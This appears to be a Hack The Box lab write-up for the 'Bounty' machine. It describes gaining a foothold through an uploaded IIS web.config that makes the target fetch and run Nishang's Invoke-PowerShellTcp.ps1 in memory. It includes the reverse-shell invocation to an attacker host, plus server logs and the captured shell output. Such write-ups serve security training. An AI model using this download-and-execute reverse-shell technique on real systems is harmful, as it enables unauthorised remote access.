InfoSec LAB

Bounty_Exploitation

Created: 2 min read

File Upload

Now that I have confirmed the code execution, I can move on to the exploitation Uploading the payload

The target web server throws the code 500 upon navigating to /uploadedfiles/web.config Direct execution seems to be impossible; as tried with many different types of payloads

Jumping

SOLUTION

Since direct execution is not viable, “jumping” would be appropriate;

  1. Victim connects to the attacker to download a malicious script/binary
  2. Upon download the malicious script/binary executes to connect back to the attacker
  3. Attacker receives the shell

For this operation, I can use the Nishang’s Invoke-PowerShellTcp.ps1 script to have the target system execute the code on memory

I can do that by appending the function itself at the bottom of the script

Invoke-PowerShellTcp -Reverse -IPAddress <LHOST> -Port <LPORT> Like so.

I then start a web server on Kali, hosting the PowerShell script above

Uploading the updated payload intended for jumping

Upon sending a GET request to /uploadedfiles/web.config by refreshing the browser, the webserver just hangs there. It’s likely caused the system executing the code

┌──(kali㉿kali)-[~/archive/htb/labs/bounty]
└─$ simplehttp .
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.93 - - [09/Oct/2022 02:41:36] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

.. and the web server, hosting the PowerShell script, leaves a log noting that there has been a GET request to the PowerShell script from the target IP address

┌──(kali㉿kali)-[~/archive/htb/labs/bounty]
└─$ nnc 9998       
listening on [any] 9998 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.93] 49162
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
 
PS C:\windows\system32\inetsrv> whoami
bounty\merlin
PS C:\windows\system32\inetsrv> hostname
bounty
PS C:\windows\system32\inetsrv> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.93
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
 
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

The Netcat listener that was waiting for a connection receives the shell as the on-mem PowerShell script got executed on the target’s memory right after completion of downloading

Initial Foothold as merlin via the web.config upload

Interactive Graph View

Backlinks